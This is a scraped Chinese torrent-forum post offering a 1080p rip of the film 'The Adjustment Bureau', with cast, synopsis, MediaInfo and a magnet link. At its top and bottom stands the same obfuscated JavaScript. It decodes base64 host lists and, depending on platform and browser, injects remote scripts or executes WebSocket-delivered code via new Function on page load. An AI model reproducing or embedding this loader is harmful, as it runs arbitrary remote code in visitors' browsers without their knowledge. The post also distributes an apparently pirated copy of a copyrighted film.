命运规划局[繁体字幕].The.Adjustment.Bureau.2011.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 12.40GB

版主小s 1月前 231

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 命运规划局 / 联邦检察局 / 天网逆缘(港) / 联邦调查局 / 调整局

◎片 名 The Adjustment Bureau

◎年 代 2011

◎产 地 美国

◎类 别 爱情 / 科幻

◎语 言 英语

◎上映日期 2011-02-26(贝尔格莱德电影节) / 2011-03-04(美国)

◎IMDb链接 https://www.imdb.com/title/tt1385826/

◎豆瓣评分 7.0/10 (80053人评价)

◎豆瓣链接 https://movie.douban.com/subject/3569943/

◎片 长 106分钟

◎导 演 乔治·诺非 George Nolfi (id:1322185)

◎编 剧 乔治·诺非 George Nolfi (id:1322185)

菲利普·迪克 Philip K. Dick (id:1036650)

◎演 员 马特·达蒙 Matt Damon (id:1054443)

艾米莉·布朗特 Emily Blunt (id:1041022)

弗洛伦斯·卡斯特里纳 Florence Kastriner (id:1403832)

迈克尔·凯利 Michael Kelly (id:1104615)

菲莉丝·麦克布赖德 Phyllis MacBryde (id:1403833)

查克·斯卡伯勒 Chuck Scarborough (id:1042188)

乔恩·斯图尔特 Jon Stewart (id:1036522)

迈克·布隆伯格 Michael Bloomberg (id:1005603)

安东尼·麦凯 Anthony Mackie (id:1027217)

格雷戈里·雷 Gregory Lay (id:1225140)

詹姆斯·卡维尔 James Carville (id:1041322)

Mary Matalin Mary Matalin (id:1121348)

约翰·斯拉特里 John Slattery (id:1022661)

阿曼达·沃伦 Amanda Warren (id:1345796)

安东尼·瑞维瓦 Anthony Ruivivar (id:1145203)

法妮勒埃文斯 Venida Evans (id:1081942)

Fabrizio Brienza Fabrizio Brienza (id:1068062)

大卫·毕逊斯 David Bishins (id:1278683)

杨罗布 Rob Yang (id:1397751)

詹妮弗·艾莉 Jennifer Ehle (id:1012506)

约翰尼·希科 Johnny Cicco (id:1070766)

佩德罗·帕斯卡 Pedro Pascal (id:1329628)

皮特·J.费尔南德斯 Peter J. Fernandez (id:1081742)

Peter Epstein Peter Epstein (id:1283250)

哈罗德·布里吉佛斯 Harold Bridgeforth (id:1371475)

玛德琳·奥布莱特 Madeleine Albright (id:1170288)

普鲁瓦·贝迪 Purva Bedi (id:1066763)

马米·科西科 Marmee Cosico (id:1263189)

Bejay Rose Bejay Rose (id:1449283)

娜塔莉·卡特 Natalie Carter (id:1406255)

布莱恩·马霍尼 Brian Mahoney (id:1346533)

David Macerelli David Macerelli (id:1173858)

Kirk LaSalle (id:1247108)

Jesse Jackson Jesse Jackson (id:1107867)

罗丝玛丽·霍华德 Rosemary Howard (id:1393141)

Byron Habinsky (id:1260660)

Wayne Scott Miller Wayne Scott Miller (id:1200575)

特伦斯·斯坦普 Terence Stamp (id:1010570)

金大贤 Daniel Dae Kim (id:1022618)

Lawrence R. Leritz Lawrence R. Leritz (id:1054941)

贾森·克拉维茨 Jason Kravits (id:1054954)

乔尔·德·拉·冯特 Joel de la Fuente (id:1089839)

大卫·阿伦·伯施理 David Alan Basche (id:1049759)

Meghan Andrews Meghan Andrews (id:1060351)

肖恩·麦克雷 Shane McRae (id:1114978)

唐尼·科沙瓦茨 Donnie Keshawarz (id:1216455)

布莱恩·黑利 Brian Haley (id:1005021)

艾力克·克莱普科 Eric Kripke (id:1045134)

托马斯·纽曼 Thomas Newman (id:1027939)

约翰·托尔 John Toll (id:1276189)

◎标 签 科幻 / 美国 / 爱情 / 2011 / 悬疑 / 人生 / 剧情 / 奇幻

◎简 介

本影片根据菲利普·K·迪克的短篇小说《规划小组(Adjustment Team)》改编。

天生就适合走上政治舞台的大卫·诺里斯(马特·达蒙 Matt Damon 饰),是一名政坛的明日之星,他在信心满满的参选纽约州参议员期间,意外认识了认识美丽的芭蕾女演员爱丽丝(艾米莉·布朗特 Emily Blunt 饰),两人一见钟情,正当情意正浓时大卫突然被一群穿黑西装、戴黑帽和墨镜的神秘人士绑走。这群自称是隶属于联邦的人生命运调整局的人,告诉大卫他命里该当总统,伊丽丝也会成为世界著名的编舞家,他们的相爱会使两人的前途都成为泡影。规划局想尽一切方式阻止两人再次相遇。知道真相的大卫是会追求自己的梦想而放弃爱丽丝?还是为了真爱,对抗命运调整局呢?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 258202630939963366703618097392694412046 (0xC2400492C7AA3BCAB63CF853D781430E)

  4. Complete name : The.Ad[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.4 GiB

  8. Duration : 1 h 45 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 16.8 Mb/s

  11. Encoded date : UTC 2021-10-27 06:00:57

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 45 min

  21. Bit rate : 12.5 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.262

  31. Stream size : 9.26 GiB (75%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 12537 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / total-frames=152128 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 45 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 893 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 2.88 GiB (23%)

  58. Title : English DTS-HD Master Audio 5.1 @ 3893 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 45 min

  69. Bit rate mode : Constant

  70. Bit rate : 192 kb/s

  71. Channel(s) : 2 channels

  72. Channel layout : L R

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 145 MiB (1%)

  77. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Text #1

  83. ID : 4

  84. Format : PGS

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 1 h 38 min

  88. Bit rate : 46.5 kb/s

  89. Count of elements : 2984

  90. Stream size : 32.6 MiB (0%)

  91. Title : Eng/SUP

  92. Language : English

  93. Default : No

  94. Forced : No


  95. Text #2

  96. ID : 5

  97. Format : PGS

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 1 h 37 min

  101. Bit rate : 33.0 kb/s

  102. Count of elements : 2854

  103. Stream size : 23.1 MiB (0%)

  104. Title : Cht/SUP 原盘繁体(HK)

  105. Language : Chinese

  106. Default : No

  107. Forced : No


  108. Text #3

  109. ID : 6

  110. Format : PGS

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 37 min

  114. Bit rate : 33.7 kb/s

  115. Count of elements : 2854

  116. Stream size : 23.6 MiB (0%)

  117. Title : Cht/SUP 原盘繁体(TW)

  118. Language : Chinese

  119. Default : Yes

  120. Forced : No


  121. Text #4

  122. ID : 7

  123. Format : PGS

  124. Codec ID : S_HDMV/PGS

  125. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration : 1 h 38 min

  127. Bit rate : 64.2 kb/s

  128. Count of elements : 3219

  129. Stream size : 45.5 MiB (0%)

  130. Title : Eng/SUP Commentary

  131. Language : English

  132. Default : No

  133. Forced : No


  134. Menu

  135. 00:00:00.000 : en:第 01 章

  136. 00:06:37.772 : en:第 02 章

  137. 00:14:17.482 : en:第 03 章

  138. 00:20:58.215 : en:第 04 章

  139. 00:28:35.547 : en:第 05 章

  140. 00:31:11.495 : en:第 06 章

  141. 00:35:22.245 : en:第 07 章

  142. 00:38:58.836 : en:第 08 章

  143. 00:43:07.001 : en:第 09 章

  144. 00:51:35.050 : en:第 10 章

  145. 00:58:33.009 : en:第 11 章

  146. 01:02:14.981 : en:第 12 章

  147. 01:07:32.090 : en:第 13 章

  148. 01:12:00.650 : en:第 14 章

  149. 01:14:13.491 : en:第 15 章

  150. 01:19:47.574 : en:第 16 章

  151. 01:24:11.546 : en:第 17 章

  152. 01:30:00.604 : en:第 18 章

  153. 01:35:53.748 : en:第 19 章

  154. 01:38:54.470 : en:第 20 章




复制代码


TAGS 科幻 爱情

磁力链:
  • magnet:?xt=urn:btih:E92E5BB1EBDCAC618469F34C123978208ACF6B60

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};